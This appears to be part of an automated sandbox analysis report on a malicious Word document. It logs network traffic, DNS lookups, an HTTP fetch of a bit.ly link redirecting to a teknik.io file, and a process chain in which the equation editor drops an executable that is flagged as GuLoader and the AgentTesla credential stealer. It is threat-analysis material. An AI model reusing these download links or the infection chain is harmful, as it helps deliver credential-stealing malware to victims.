                                                                                  Feb 24, 2021 13:06:52.885207891 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.885236025 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.885276079 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.885294914 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.918937922 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.918989897 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.919028044 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.919066906 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.919104099 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.919142008 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.919189930 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.919209957 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.919233084 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.919253111 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.919260025 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.919265032 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.919271946 CET49168443192.168.2.225.79.72.163

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Feb 24, 2021 13:06:50.275626898 CET5219753192.168.2.228.8.8.8
                                                                                  Feb 24, 2021 13:06:50.288167953 CET53521978.8.8.8192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.472788095 CET5309953192.168.2.228.8.8.8
                                                                                  Feb 24, 2021 13:06:50.494493961 CET53530998.8.8.8192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.935065031 CET5283853192.168.2.228.8.8.8
                                                                                  Feb 24, 2021 13:06:50.947669029 CET53528388.8.8.8192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.951725006 CET6120053192.168.2.228.8.8.8
                                                                                  Feb 24, 2021 13:06:50.964308977 CET53612008.8.8.8192.168.2.22
                                                                                  Feb 24, 2021 13:06:51.469333887 CET4954853192.168.2.228.8.8.8
                                                                                  Feb 24, 2021 13:06:51.487565041 CET53495488.8.8.8192.168.2.22
                                                                                  Feb 24, 2021 13:06:51.490777969 CET5562753192.168.2.228.8.8.8
                                                                                  Feb 24, 2021 13:06:51.503056049 CET53556278.8.8.8192.168.2.22
                                                                                  Feb 24, 2021 13:08:14.036895037 CET5600953192.168.2.228.8.8.8
                                                                                  Feb 24, 2021 13:08:14.049120903 CET53560098.8.8.8192.168.2.22
                                                                                  Feb 24, 2021 13:08:15.175936937 CET6186553192.168.2.228.8.8.8
                                                                                  Feb 24, 2021 13:08:15.239042044 CET53618658.8.8.8192.168.2.22

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Feb 24, 2021 13:06:50.275626898 CET192.168.2.228.8.8.80x26d4Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                  Feb 24, 2021 13:06:50.472788095 CET192.168.2.228.8.8.80x437eStandard query (0)u.teknik.ioA (IP address)IN (0x0001)
                                                                                  Feb 24, 2021 13:08:14.036895037 CET192.168.2.228.8.8.80x1e5eStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                  Feb 24, 2021 13:08:15.175936937 CET192.168.2.228.8.8.80x60f4Standard query (0)cbzrfq.bl.files.1drv.comA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Feb 24, 2021 13:06:50.288167953 CET8.8.8.8192.168.2.220x26d4No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                  Feb 24, 2021 13:06:50.288167953 CET8.8.8.8192.168.2.220x26d4No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                  Feb 24, 2021 13:06:50.494493961 CET8.8.8.8192.168.2.220x437eNo error (0)u.teknik.ioteknik.ioCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 24, 2021 13:06:50.494493961 CET8.8.8.8192.168.2.220x437eNo error (0)teknik.io5.79.72.163A (IP address)IN (0x0001)
                                                                                  Feb 24, 2021 13:08:14.049120903 CET8.8.8.8192.168.2.220x1e5eNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 24, 2021 13:08:15.239042044 CET8.8.8.8192.168.2.220x60f4No error (0)cbzrfq.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 24, 2021 13:08:15.239042044 CET8.8.8.8192.168.2.220x60f4No error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • bit.ly

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.224916767.199.248.1180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 24, 2021 13:06:50.315624952 CET0OUTGET /3qO7045 HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: bit.ly
                                                                                  Connection: Keep-Alive
                                                                                  Feb 24, 2021 13:06:50.422799110 CET1INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 24 Feb 2021 12:06:50 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 116
                                                                                  Cache-Control: private, max-age=90
                                                                                  Location: https://u.teknik.io/PWua8.txt
                                                                                  Set-Cookie: _bit=l1oc6O-1f1018e00109e7d832-00p; Domain=bit.ly; Expires=Mon, 23 Aug 2021 12:06:50 GMT
                                                                                  Via: 1.1 google
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 74 65 6b 6e 69 6b 2e 69 6f 2f 50 57 75 61 38 2e 74 78 74 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://u.teknik.io/PWua8.txt">moved here</a></body></html>


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Start time:13:06:36
                                                                                  Start date:24/02/2021
                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                  Imagebase:0x13f990000
                                                                                  File size:1424032 bytes
                                                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:13:06:38
                                                                                  Start date:24/02/2021
                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                  Imagebase:0x400000
                                                                                  File size:543304 bytes
                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:13:06:41
                                                                                  Start date:24/02/2021
                                                                                  Path:C:\Users\Public\69577.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\Public\69577.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:131072 bytes
                                                                                  MD5 hash:5D2D34449323C67BA1F5EC7561DF2204
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic
                                                                                  Antivirus matches:
                                                                                  • Detection: 12%, ReversingLabs
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:13:07:56
                                                                                  Start date:24/02/2021
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\Public\69577.exe
                                                                                  Imagebase:0x1340000
                                                                                  File size:53248 bytes
                                                                                  MD5 hash:246BB0F8D68A463FD17C235DEB5491C0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:13:08:11
                                                                                  Start date:24/02/2021
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:dw20.exe -x -s 1612
                                                                                  Imagebase:0x10000000
                                                                                  File size:33936 bytes
                                                                                  MD5 hash:FBA78261A16C65FA44145613E3669E6E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >